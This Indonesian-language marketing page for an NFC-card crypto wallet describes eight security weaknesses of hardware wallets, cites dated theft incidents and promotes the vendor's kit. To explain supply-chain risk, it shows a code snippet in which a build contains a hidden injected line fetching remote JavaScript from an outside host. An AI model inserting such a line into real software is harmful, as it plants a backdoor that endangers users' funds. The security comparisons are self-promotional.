8 celah Kode terbuka Daftar periksa FAQ
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS Buat dompetBuat
Dompet hardware · celah yang tidak jelas

Celah yang tidak jelas pada dompet hardware

Kamu membeli perangkat untuk menutup lubang. Bersamanya datang yang baru: firmware, pembaruan, layanan di komputer, layar, kotak, akun penjual. Delapan detail yang ulasan catat sebagai kelebihan — dan delapan cara uang diambil lewat itu pada 2020–2026.

Kasus nyata dengan tanggal dan jumlah Dari dokumentasi produsen Kami nilai kit kami dengan daftar yang sama
Harga sebuah kesalahankasus publik
2026Coldcard · keacakan lemah di firmware$100M+
2025Bybit · penandatangan menandatangani yang tidak mereka lihat$1.5B
2024Dark Skippy · seed bocor lewat dua tanda tanganriset
2023Ledger Connect Kit · backdoor di pustaka$600K
2021Aplikasi dompet palsu di App Store17,1 BTC
2020Kebocoran DB pelanggan Ledger · phishing bertahun-tahun270.000 orang
Delapan celah

Setiap detail yang dipuji ulasan adalah lubang terpisah

Dompet hardware menutup satu lubang: kunci tidak lagi berada di ponsel yang terhubung internet. Tapi perangkatnya tidak kosong. Ada firmware, pembaruan, program desktop, layar, kotak, penjual dengan alamatmu — dan setiap detail menambah permukaan serangan yang sebelumnya tidak ada. Di bawah delapan detail itu: apa kata ulasan, bagaimana uang diambil lewatnya, cara menutup celah, dan apakah kit kami punya detail itu.

Celah 01

Firmware yang membuat kuncimu

Di ulasan: «chip aman — kunci dibuat di dalam perangkat dan tidak pernah keluar»

Kunci adalah angka acak yang sangat besar, dan firmware yang membuatnya. Satu bug di situ — dan kunci jauh lebih sedikit dari yang kamu kira: mereka di-brute-force untuk semua pemilik sekaligus, tanpa akses perangkat, bertahun-tahun setelah pembelian. Chipnya tidak relevan; lubangnya ada di atasnya.

Insiden
$100M+
Coldcard, Juli 2026: bug build firmware sejak 2021 diam-diam mengganti RNG hardware dengan yang lemah, di-seed dari nomor seri perangkat dan timer. Kekuatan kunci turun ke sekitar 40 bit; 5.000+ alamat dikosongkan.
Cara menutup celah
Bisakah kamu membawa keacakan sendiri: lemparan dadu, frasa sendiri. Dompet yang menerima entropi darimu tidak bergantung pada satu bug firmware.
Detail ini tidak ada di kami
Tidak ada firmware di kartu — itu pembawa terenkripsi. Mitilena Air membuat kunci dari RNG sistem perangkat, dan kamu bisa menetapkan frasa seed sendiri alih-alih kata acak.
Celah 02

Pembaruan yang wajib kamu pasang

Di ulasan: «produsen rutin mengirim pembaruan keamanan»

Setiap pembaruan adalah momen ketika firmware bisa diganti. Firmware yang diutak-atik menyembunyikan pecahan seed dalam dua atau tiga tanda tangan biasa sementara perangkat tampak normal dari luar. Melewatkan pembaruan juga bukan opsi: lubang ditambal justru dengan pembaruan itu.

Insiden
2 tanda tangan
Dark Skippy, Agustus 2024: peneliti menunjukkan firmware jahat dompet hardware bisa mengeluarkan seluruh seed lewat dua transaksi. Satu pembaruan dari tempat yang salah sudah cukup.
Cara menutup celah
Dari mana firmware datang dan apakah perangkat memverifikasi tanda tangannya. Paling baik bila tidak ada yang perlu diperbarui.
Detail ini tidak ada di kami
Tidak ada yang bisa diperbarui atau diganti di kartu. Penandatanganan terjadi di aplikasi ponsel; build-nya ditandatangani dan datang dari App Store serta Google Play — seperti aplikasi apa pun yang kamu lihat dan tutup sendiri.
Celah 03 · Rasakan absurditasnya
Di ulasan: «aplikasi desktop resmi yang nyaman»

Dompet untuk ketidakpercayaan yang datang dengan layanan latar

Kamu membeli perangkat untuk satu alasan: agar tidak lagi mempercayai komputer. Agar berfungsi, kamu harus memasang layanan latar di komputer yang sama. Kamu tidak menulisnya, tidak menjalankannya, dan tidak mengontrolnya: ia start bersama OS, mendengarkan port yang bisa diketuk program mana pun di mesinmu, dan sedang melakukan sesuatu sekarang — apa tepatnya, kamu tidak tahu dan tidak akan pernah memverifikasi.

Ia tetap berjalan di latar setelah kamu menutup dompet. Bertahun-tahun. Di salah satu produsen terbesar itu layanan «jembatan» terpisah; pada 2025 mereka menyembunyikannya di dalam aplikasi sendiri — layanannya tetap ada, hanya mati bersama jendela. Untuk kebanyakan yang lain, tanpa program desktop perangkat hanyalah gantungan kunci. Di Linux tambahkan aturan udev atau sistem tidak akan menyerahkan USB.

Jadi barang yang kamu beli agar tidak bergantung pada program komputer justru tidak bekerja tanpa program komputer. Dan bukan yang kamu lihat — yang berjalan di bawahnya.

Detail ini tidak ada di kami
Tidak ada yang dipasang di komputer: tanpa layanan, driver, atau port. Perantaranya adalah chip NFC yang sudah ada di ponselmu, dibuat produsennya dan diatur OS: hanya bekerja saat aplikasi terbuka dan kamu sendiri menempelkan kartu, dan ponsel meminta izin setiap kali. Kartunya pasif: tanpa baterai, tanpa radio, tidak melakukan apa pun sendiri. Tutup aplikasi — tidak tersisa apa pun yang berjalan tanpamu. Jujur: aplikasi ponsel tetap dibutuhkan, dan seperti yang lain — kamu melihatnya, menjalankannya, dan menutupnya sendiri. Tidak ada siapa pun yang tinggal di ruang utilitas.
Monitor sistemDOMPET DITUTUP
ProcessStateUptime
HW Wallet Appwallet
ditutup olehmu-
hwwalletdlayanan latar · jembatan USB
running412d 06:14
dijalankan sistem saat logintidak bisa ditutup — ini layanan
Mockup; nama bersifat ilustratif. Beginilah tampilan komputer dengan salah satu dompet USB paling populer sebelum 2025; lalu «jembatan» dimasukkan ke dalam aplikasi sendiri — layanan yang sama, hanya tidak lagi terlihat di daftar.
Alegori
Rumah demi privasi — dan penghuni di ruang utilitas

Kamu ingin rumah demi privasi. Kamu membelinya. Lalu butuh keamanan — dipasang. Dan agar paket keamanan berlaku, mereka meminta kamu memasukkan orang berseragam ke rumah yang tinggal di ruang utilitas sepanjang hari, memegang kunci setiap pintu, dan melapor ke orang lain. Kamu tidak merekrutnya, tidak bisa memecatnya, dan apa yang ia lakukan malam hari — kamu tidak tahu.

Ia «orang dalam», tentu saja. Begitu tertulis di kontrak. Kamu ingin privasi dan mendapat pengganti: rumah dengan penghuni yang tidak kamu pilih.

Celah 04 · Open source bukan audit
Di ulasan: «open source — siapa pun bisa memverifikasi»

Open source adalah cara programmer bekerja bersama, bukan lencana bahwa program tidak mencuri

Open source diciptakan agar orang berbagi program dan memperbaikinya bersama. Sebagai alat kolaborasi itu bagus. Itu tidak pernah menjadi stempel kualitas bahwa «perangkat lunak ini tidak akan mencuri uangmu», dan inilah alasannya: kamu tidak memakai kode sumber. Kamu memakai apa yang kamu unduh.

Antara repo GitHub dan file di ponselmu ada build, app store, pembaruan, server. Di salah satu langkah itu satu baris bisa masuk ke kode yang menarik apa saja dari mana saja — dan itu tidak akan ada di repo. Kamu tidak bisa membandingkan salinanmu dengan sumber: toko mengirim file terkompilasi; dompet web mendapat kode apa pun yang dipilih server untukmu hari ini; ekstensi browser diperbarui diam-diam di malam hari.

«Terbuka» berarti beberapa orang bisa memeriksa beberapa versi pada suatu hari. Apa yang salinanmu lakukan sekarang — itu tidak berarti itu.

Di repo · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Di ponselmu · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Satu baris di build. Tidak di repo, tak terlihat di toko, berjalan di perangkatmu.
Keterbukaan tidak menghentikan satu pun kasus ini
Ledger Connect Kit2023
pustaka terbuka di GitHub; versi jahat dipublikasikan ke npm; puluhan situs memuatnya secara live dalam hitungan jam
Copay / event-stream2018
dompet terbuka; backdoor masuk lewat dependensi yang ditargetkan khusus padanya
xz utils2024
terbuka selama dua puluh tahun; backdoor ada di rilis sampai seorang engineer menyadari login SSH setengah detik lebih lambat
Coldcard2026
firmware open-source; bug build selama lima tahun mengganti RNG hardware dengan yang lemah — kunci di-brute-force tanpa akses perangkat, 5.000+ alamat, $100M+
Yang benar-benar bekerja
Bukan membaca kode orang lain — dua pemeriksaan yang siapa pun bisa jalankan. Pertama, audit perilaku: pasang proxy penyadap di komputer, arahkan aplikasi lewatnya, dan lihat apa yang dikirim ke mana. Tidak perlu membaca kode — lalu lintas sepenuhnya terlihat. Kedua, arsitektur di mana kode tidak punya apa pun untuk dicuri: jika kunci tidak pernah berada di perangkat berjaringan, baris mana pun di pembaruan mana pun tidak berdaya — tidak ada yang bisa dikirim.
Cara kami
Yang pertama kami tawarkan sendiri: jalankan aplikasi kami lewat proxy, versi web lewat DevTools browser, dan periksa setiap permintaan. Kunci penandatanganan dan seed tidak akan muncul; satu-satunya catatan adalah view key Monero — dibahas di halaman «cara transfer keluar». Yang kedua ada di kit: kunci lahir di Mitilena Air pada perangkat tanpa internet, hidup di kartu, dan hanya tanda tangan yang sampai ke aplikasi online — di situ tidak ada yang perlu di-proxy. Dan offline di sini nyata: dalam mode air-gap perangkat kunci tidak terhubung ke apa pun — tanpa kabel, tanpa Bluetooth; transaksi masuk dan keluar sebagai kode QR yang kamu lihat dengan mata. Bukan dompet «dingin» di kabel yang menggantung di komputer online dengan layanannya sendiri yang bertukar entah apa.
Celah 05

Layar yang tidak menunjukkan apa yang kamu tandatangani

Di ulasan: «konfirmasi di layar perangkat — virus di komputer tidak berdaya»

Layarnya kecil, dan sering menampilkan hash atau «contract call», bukan alamat dan jumlah. Kamu mengonfirmasi yang tidak bisa kamu lihat — dan tanda tangan tetap jujur, milikmu. Layar memberi perasaan kontrol yang sebenarnya tidak ada.

Insiden
$1.5B
Bybit, Februari 2025: penandatangan dengan dompet hardware mengonfirmasi transfer yang tampak biasa di UI. Perangkat menampilkan data yang tidak bisa diverifikasi manusia.
Cara menutup celah
Penerima, jumlah, dan jenis operasi dalam bahasa manusia — bukan hash — serta tombol Reject sekali tekan.
Cara kami
Ada layar, tapi itu layar ponsel: alamat, jumlah, dan jenis permintaan dalam kata — transfer, contract call, approval — serta tombol Reject. Untuk jumlah besar — perangkat offline terpisah yang menerima transaksi lengkap.
Celah 06

Kotak yang sudah berisi seed

Di ulasan: «dikirim dalam kotak tersegel dengan segel keamanan»

Perangkat fisik berarti pengiriman, perantara, dan marketplace «diskon». Dompet datang sudah disetel, dengan seed di slip di dalamnya. Atau aplikasi mirip di toko meminta kamu «masukkan seed untuk mengaktifkan».

Insiden
17,1 BTC
App Store, 2021: pemilik dompet hardware memasukkan seed ke aplikasi mirip dan kehilangan 17,1 BTC. Tahun yang sama, setelah kebocoran DB, pelanggan Ledger dikirimi perangkat palsu dengan surat «pindahkan seed ke yang baru».
Cara menutup celah
Inisialisasi sendiri dan jangan pernah memakai seed yang datang sudah tertulis. Segel bukan verifikasi; verifikasi adalah bahwa kamu yang membuat kunci.
Cara kami
Kartu datang kosong: kamu membuat kunci dan menulisnya sendiri — tidak mungkin ada seed siap pakai di kotak. Aplikasi hanya dari App Store dan Google Play lewat tautan di situs; ia meminta seed hanya saat impor dan penandatanganan.
Celah 07

Akun penjual

Di ulasan: «garansi resmi, dukungan, dan akun pribadi»

Untuk membeli perangkat kamu memberi produsen nama, email, dan alamat pengiriman. Keamananmu kini bergantung pada basis data mereka. Jika bocor — bertahun-tahun kamu akan mendapat pesan «konfirmasikan seed di perangkat baru», kadang disertai paket.

Insiden
270.000 orang
Ledger, 2020: data 270.000 pembeli bocor, termasuk alamat pos. Email, telepon, dan paket yang meminta kamu «memigrasi» seed berlanjut hingga hari ini.
Cara menutup celah
Semakin sedikit yang mereka tahu tentangmu, semakin pendek vektornya: beli tanpa akun, dukungan yang tidak pernah meminta seed, dan aturan «hanya pencuri yang meminta seed».
Detail ini tidak ada di kami
Dompet bekerja tanpa registrasi — tanpa akun. Penjual hanya tahu alamat pengiriman. Baik dukungan maupun aplikasi tidak meminta seed.
Celah 08

Satu perangkat dan satu slip kertas

Di ulasan: «casing tangguh, layar besar, baterai seminggu»

Semakin banyak bagian, semakin banyak yang rusak: konektor, layar, baterai. Pemulihan bergantung pada satu slip seed — basah, hilang saat pindah, difoto «untuk berjaga-jaga». Penyebab kehilangan paling umum bukan peretasan.

Insiden
≈20 % BTC
Chainalysis memperkirakan sekitar seperlima dari semua bitcoin hilang selamanya — sebagian besar karena kunci hilang, bukan peretasan.
Cara menutup celah
Berapa salinan kunci yang dikirim di kotak dan dalam bentuk apa, apa yang terjadi jika perangkat hilang, dan apakah ada yang bisa rusak di dalamnya.
Detail ini tidak ada di kami
Tanpa layar, baterai, atau konektor — tidak ada yang bisa rusak. Dan bukan satu salinan: lima salinan cermin di kotak — dua kartu NFC dan tiga stiker stealth dalam plastik tahan air, 10+ tahun.
Daftar periksa

Apa yang seharusnya tidak ada di dompet

Delapan detail untuk delapan celah. Daftar ini cocok untuk dompet apa pun — hardware, mobile, browser. Centang apa yang dimiliki yang sedang kamu pilih — dan milik kami juga.

01
Kunci yang dibuat hanya oleh perangkat lunaktanpa keacakan sendiri — frasamu atau dadu
02
Pembaruan di tempat kunci tinggalsetiap pembaruan adalah peluang menukar kode
03
Layanan, driver, atau port di komputerlihat celah 03
04
Lencana «open source» alih-alih arsitekturkunci berada di tempat kode asing bisa menjangkaunya
05
Layar yang menampilkan hash alih-alih alamat dan jumlahdan tanpa tombol Reject
06
Seed yang datang sudah tertulisdi kotak, di surat, di «aplikasi aktivasi»
07
Akun penjualdan dukungan yang mungkin meminta seed
08
Satu salinan dan bagian yang rusaklayar, baterai, konektor, satu slip kertas
Dalam daftar ini, kit Ultimate tidak punya satu pun dari delapan detail itu. Di kotak: 2 kartu NFC dan 3 stiker stealth, Mitilena Air (kunci tanpa internet) dan Mitilena Keys (penandatanganan tanpa internet). Kartu datang kosong: kamu membuat dan mengenkripsi kunci — bukan chip pabrik. Isi dan harga →
Ultimate · kit offline

Bukan «chip aman» pabrik — pembawa yang kamu enkripsi

Kartu datang kosong. Kamu membuat kunci di Mitilena Air pada ponsel tanpa internet dan menulisnya sendiri. Penandatanganan lewat Mitilena Keys, juga offline: transaksi berjalan lewat QR. Lima salinan identik di kotak: 2 kartu NFC dan 3 stiker stealth dalam plastik tahan air. 18 jaringan, 20.000+ koin, termasuk USDT.

Tidak ada yang dipasang di komputer
Tanpa firmware, pembaruan, layar, atau baterai
Transaksi ke ponsel offline — lewat suara atau QR, tanpa kabel atau USB
Bekerja dengan aplikasi ponsel Mitilena gratis
Plastik tahan air, masa simpan 10+ tahun
Pengiriman ke seluruh dunia · mitilena-store.com
Mitilena NFC card
Ultimate · generasi dan penandatanganan offline
€369€439
2 kartu NFC · 3 stiker stealth · Mitilena Air · lisensi Mitilena Keys
Beli Ultimate · €369 Basic dan Premium — lihat semua paket
FAQ

Yang orang tanyakan setelah membaca sejauh ini

Kelebihan dan kekurangan dompet hardware — versi singkat?

Satu kelebihan besar: kunci tidak di ponsel yang terhubung internet. Kekurangannya adalah delapan detail di atas — masing-masing menambah permukaan serangan. Dompet hardware yang baik adalah yang punya lebih sedikit detail, bukan lebih banyak.

Bagaimana jika ponsel terkompromi?

Dengan kartu di ponsel utama, kunci muncul di lingkungan terisolasi selama detik penandatanganan — risiko yang sama seperti dompet ponsel mana pun, hanya lebih singkat. Untuk jumlah yang menakutkanmu — lapisan kedua: tandatangani di perangkat offline terpisah yang dijangkau transaksi lewat QR.

Bagaimana jika kartu dicuri atau hilang?

Tanpa kata sandi, kartu dan stiker hanyalah plastik tidak berguna — kunci di dalamnya terenkripsi. Salinan yang hilang diganti empat lainnya: dua kartu dan tiga stiker dari kotak adalah cermin.

Apakah perlu memperbarui firmware dompet hardware?

Jika vendor menutup lubang — ya, dan justru saat itulah firmware bisa diganti: periksa sumber dan tanda tangannya. Pembawa tanpa firmware tidak punya pilihan itu — tidak ada yang diperbarui, tidak ada yang diganti.

Apa bedanya dengan dompet USB?

Lebih sedikit perantara: tanpa kabel, driver, layanan latar, atau program desktop. Satu perantara — chip NFC ponselmu — dan ia menjawab kepadamu dan OS, bukan ke vendor dompet.

Open source berarti aman?

Artinya bisa diperiksa oleh seseorang, suatu saat. Kamu memakai bukan kode melainkan yang kamu unduh, dan kamu tidak bisa membandingkan keduanya. Keamanan datang dari arsitektur di mana kunci tidak berada di tempat kode asing bisa menjangkaunya.

Kartu NFC dengan generasi dan penandatanganan offline

Beli Ultimate · €369 Buat dompet gratis